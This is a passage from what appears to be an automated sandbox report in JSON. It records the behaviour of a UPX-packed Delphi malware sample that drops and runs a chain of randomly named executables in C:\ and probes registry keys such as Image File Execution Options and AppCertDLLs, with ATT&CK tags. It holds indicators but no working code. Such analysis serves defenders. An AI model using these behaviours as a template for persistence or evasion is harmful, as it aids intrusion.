called \"CreateProcessA\" with parameter \"c:\\jtpjhr.exe\" - (UID: 00000000-00003404)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has an executable section named \"UPX0\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has an executable section named \"UPX1\"\n \"4644224.exe\" has an executable section named \"UPX0\"\n \"4644224.exe\" has an executable section named \"UPX1\"\n \"62424.exe\" has an executable section named \"UPX0\"\n \"62424.exe\" has an executable section named \"UPX1\"\n \"20082.exe\" has an executable section named \"UPX0\"\n \"20082.exe\" has an executable section named \"UPX1\"\n \"xxvjvfv.exe\" has an executable section named \"UPX0\"\n \"xxvjvfv.exe\" has an executable section named \"UPX1\"\n \"rpfxpvf.exe\" has an executable section named \"UPX0\"\n \"rpfxpvf.exe\" has an executable section named \"UPX1\"\n \"66262.exe\" has an executable section named \"UPX0\"\n \"66262.exe\" has an executable section named \"UPX1\"\n \"6820002.exe\" has an executable section named \"UPX0\"\n \"6820002.exe\" has an executable section named \"UPX1\"\n \"020066.exe\" has an executable section named \"UPX0\"\n \"020066.exe\" has an executable section named \"UPX1\"\n \"fjjxl.exe\" has an executable section named \"UPX0\"\n \"fjjxl.exe\" has an executable section named \"UPX1\"\n \"82488.exe\" has an executable section named \"UPX0\"\n \"82488.exe\" has an executable section named \"UPX1\"\n \"04226.exe\" has an executable section named \"UPX0\"\n \"04226.exe\" has an executable section named \"UPX1\"\n \"240402.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has an writable section named \"UPX0\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has an writable section named \"UPX1\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has an writable section named \"UPX2\"\n \"4644224.exe\" has an writable section named \"UPX0\"\n \"4644224.exe\" has an writable section named \"UPX1\"\n \"4644224.exe\" has an writable section named \"UPX2\"\n \"62424.exe\" has an writable section named \"UPX0\"\n \"62424.exe\" has an writable section named \"UPX1\"\n \"62424.exe\" has an writable section named \"UPX2\"\n \"20082.exe\" has an writable section named \"UPX0\"\n \"20082.exe\" has an writable section named \"UPX1\"\n \"20082.exe\" has an writable section named \"UPX2\"\n \"xxvjvfv.exe\" has an writable section named \"UPX0\"\n \"xxvjvfv.exe\" has an writable section named \"UPX1\"\n \"xxvjvfv.exe\" has an writable section named \"UPX2\"\n \"rpfxpvf.exe\" has an writable section named \"UPX0\"\n \"rpfxpvf.exe\" has an writable section named \"UPX1\"\n \"rpfxpvf.exe\" has an writable section named \"UPX2\"\n \"66262.exe\" has an writable section named \"UPX0\"\n \"66262.exe\" has an writable section named \"UPX1\"\n \"66262.exe\" has an writable section named \"UPX2\"\n \"6820002.exe\" has an writable section named \"UPX0\"\n \"6820002.exe\" has an writable section named \"UPX1\"\n \"6820002.exe\" has an writable section named \"UPX2\"\n \"020066.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4644224.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"62424.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"20082.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xxvjvfv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rpfxpvf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"66262.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"6820002.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"020066.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fjjxl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"82488.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"04226.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"240402.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2406002.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"drppx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xtrhlt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pfrdl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xfvdbnh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"blvvjn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fvbpf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ntpjj.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"644880.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"824246.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"02486.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"66842.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"lpdvdhr.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"lpdvdhr.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"lpdvdhr.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"lpdvdhr.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"lpdvdhr.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"lpdvdhr.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" reads file \"c:\\f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" reads file \"c:\\lpdvdhr.exe\"\n \"lpdvdhr.exe\" reads file \"c:\\lpdvdhr.exe\"\n \"lpdvdhr.exe\" reads file \"c:\\nrtffvl.exe\"\n \"nrtffvl.exe\" reads file \"c:\\nrtffvl.exe\"\n \"nrtffvl.exe\" reads file \"c:\\npltvpp.exe\"\n \"npltvpp.exe\" reads file \"c:\\npltvpp.exe\"\n \"npltvpp.exe\" reads file \"c:\\llxjdlf.exe\"\n \"llxjdlf.exe\" reads file \"c:\\llxjdlf.exe\"\n \"llxjdlf.exe\" reads file \"c:\\rxrfxtr.exe\"\n \"rxrfxtr.exe\" reads file \"c:\\rxrfxtr.exe\"\n \"rxrfxtr.exe\" reads file \"c:\\xhbff.exe\"\n \"xhbff.exe\" reads file \"c:\\xhbff.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\LPDVDHR.EXE\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lpdvdhr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nrtffvl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"npltvpp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"llxjdlf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rxrfxtr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xhbff.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vhppv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hfbrlh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"brftth.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2644808.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vjvxf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rxbdpdj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jdfnf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"llpbnv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dtrvhhj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lxdlb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fplntnd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xlfdrhv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nhjtnrr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4868486.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"42020.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jjjvj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tljxh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vnvdx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"F9D3E68D1AD8A7056B334DA864A4C65C94803EF5D9C34EEE1A53B8B1D49209B2\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"c:\\lpdvdhr.exe\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lpdvdhr.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"nrtffvl.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"npltvpp.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"llxjdlf.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rxrfxtr.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xhbff.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"vhppv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hfbrlh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"brftth.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"2644808.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"vjvxf.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rxbdpdj.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": 